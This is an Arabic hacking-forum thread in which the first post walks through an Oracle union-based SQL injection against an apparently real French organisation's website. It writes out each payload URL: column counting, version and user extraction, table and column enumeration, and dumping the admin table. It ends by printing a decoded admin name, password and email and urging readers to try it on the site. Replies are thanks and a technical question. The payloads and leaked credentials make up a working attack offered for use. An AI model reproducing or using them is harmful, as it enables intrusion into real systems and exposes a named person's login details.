يمنع منعاً باتاً رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com
مطلوب طاقم إشراف وأدارة للمنتدى, للمعنيين بالرجاء التواصل مع الادارة على البريد التالي :
vbspiders.network@gmail.com


العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 07-22-2012, 02:00 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية ABO-SAGER
 

 

 
إحصائية العضو





ABO-SAGER غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ABO-SAGER is on a distinguished road

افتراضي Oracle SQL Injection



السلام عليكم ورحمه الله وبركاته

الحمد لله رب العالمين والصلاه والسلام على نبي المرسلين محمد الصادق الامين


سوف اطرح لكم لمحه بسيطه عن Oracle Injection ,, الاوامر مثل sql Injection يوجد اختلاف بسيط .. واكيد الشرح مارارح يكون مثل شروحات بلاك روز وتكل فقط لمحه كتابيه بسيطه


\

http://www.cfpb.fr/cfpb_reseau_france.php?id=1


نستخرج الاعمده بالطريقه العاديه order by

www.cfpb.fr/cfpb_reseau_france.php?id=1'+order+by+14-- -

عدد العواميد 14 تعلمنا في sql Injection استخدام الامر التالي

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14

في الاوراكل بدل كتابه العواميد نخليها قيمه خاليه .. null
اذن الامر سيكون بهذا الشكل


union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,nul

نستخدم الامر التالي في معرفه العمود المصاب

http://www.cfpb.fr/cfpb_reseau_france.php?id=1'+and+1=2+union+select+ banner,null,null,null,null,null,null,null,null,nul l,null,null,null,null+from+v$version--+

نشرح الامر
+from+v$version امر استخراج اصدار القاعده طيب ماعرفنا العمود المصاب نمرر كلمه banner على كل الاعمدة وهي عبارة بصمه للاستعلام عن العمود المصاب واذا كان صحيح يظهر لك اصدار القاعده
CORE 10.2.0.4.0 Production

عرفنا العمود المصاب نستخرج اسم اليوزر واسم القاعده بالامر

http://www.cfpb.fr/cfpb_reseau_france.php?id=1'+and+1=2+union+select+ user,null,null,null,null,null,null,null,null,null, null,null,null,null+from+dual--+

في العمود رقم 1 نحط user ثم SYS.DATABASE_NAME
عاد dual ماعرفت ايش فايدتها اعتقد انهاء الامر ,, الله اعلم

اسم اليوزر : MEDIAC

اسم القاعده : PORTAILN

امر استخراج الجداول مع الحقول


http://www.cfpb.fr/cfpb_reseau_france.php?id=1'+and+1=2+union+select+ rawtohex(table_name||chr(58)||column_name),null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null+from+USER_TAB_COLUMNS--+


rawtohex(table_name||chr(58)||column_name)
rawtohex بدل الامر concat
||chr(58)|| = :
USER_TAB_COLUMNS بدل information_schema


راح يستخرج لنا الجداول والحقول مشفره ب hex نفك التشفير بتحويل الهيكس الى قيمه نصيه string
موقع لفك التشفير :


http://www.string-functions.com/hex-string.aspx


نفك تشفير جميع الجداول حتى نحصل على مانريدة ..
بعد فك التشفير وجدنا الجدول الذي يحتوي على حقل اليوزر والباسورد


UTILISATEURS:ID
UTILISATEURS
:NOM
UTILISATEURS
:PASSWORD
UTILISATEURS
:EMAIL

الان بقي لنا امر واحد وهو استخراج بيانات الادمن بالامر التالي

http://www.cfpb.fr/cfpb_reseau_france.php?id=1%27+and+1=2+union+selec t+rawtohex(ID||chr(58)||NOM||chr(58)||PASSWORD||ch r(58)||EMAIL),null,null,null,null,null,null,null,n ull,null,null,null,null,null+from+UTILISATEURS--+

الامر واضح مايحتاج شرح في العمود المصاب طلبنا منه استخراج البيانات المخزنه في الحقول
وفي نهايه الرابط from + جدول الادمن وهو UTILISATEURS .. راح تظهر لنا البيانات مشفره hex مثل ما قلنا نفك تشفيرها .. بتحويلها الى قيم نصيه string

بيانات الادمن مشفره

313A447572616E643A6774726672746F763A66726564657269 632E647572616E6440636670622E6672

بعد فك التشفير

1:Durand:gtrfrtov:frederic.durand@cfpb.fr

ان شاء الله تكون الفكرة وضحت ,, عشان تفهم طبق على الموقع










Oracle SQL Injection

التوقيع

ABO-SAGER

 

   

رد مع اقتباس
قديم 07-22-2012, 09:25 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية abdoog
 

 

 
إحصائية العضو





abdoog غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
abdoog is on a distinguished road

افتراضي رد: Oracle SQL Injection


مشكووووووووووووور ياخوي شرح رائع
ولو كان فيديو كان احلى
بس سؤال عند استخراج
الجداول هل نضع التخمين التشفير
داخل هنا ||chr(58)||
ام نخمن الجدول من هنا
بدون تشفير from+USER_TAB_COLUMNS
ارجو اني ما اطلت عليك
تحياتي لك

التوقيع


=============================
هما طريقان


http://im29.gulfup.com/WRLb10.jpg



=============================






 

   

رد مع اقتباس
قديم 07-22-2012, 09:52 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
إحصائية العضو








خالد سعودي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
خالد سعودي is on a distinguished road

افتراضي رد: Oracle SQL Injection


شكرا لك

   

رد مع اقتباس
قديم 07-22-2012, 10:33 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية nirvana115
 

 

 
إحصائية العضو






nirvana115 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
nirvana115 is on a distinguished road

افتراضي رد: Oracle SQL Injection


مشكور على الشرح الرائع

   

رد مع اقتباس
قديم 07-22-2012, 10:50 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية ABO-SAGER
 

 

 
إحصائية العضو





ABO-SAGER غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ABO-SAGER is on a distinguished road

افتراضي رد: Oracle SQL Injection


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة abdoog
مشكووووووووووووور ياخوي شرح رائع
ولو كان فيديو كان احلى
بس سؤال عند استخراج
الجداول هل نضع التخمين التشفير
داخل هنا ||chr(58)||
ام نخمن الجدول من هنا
بدون تشفير from+USER_TAB_COLUMNS
ارجو اني ما اطلت عليك
تحياتي لك

اعتقد داخل ||chr(58)||

تابع المصدر من هنا

والله انا مبتداء في اوراكل انا شفت الدرس عجبني وستفدت منو ونقلتو لكم حتى الجميع يستفيد

سامحني ^_^

ممنوع الاشهار
التوقيع

ABO-SAGER

 


التعديل الأخير تم بواسطة aircrack -ng ; 07-23-2012 الساعة 12:11 AM.

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 04:40 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0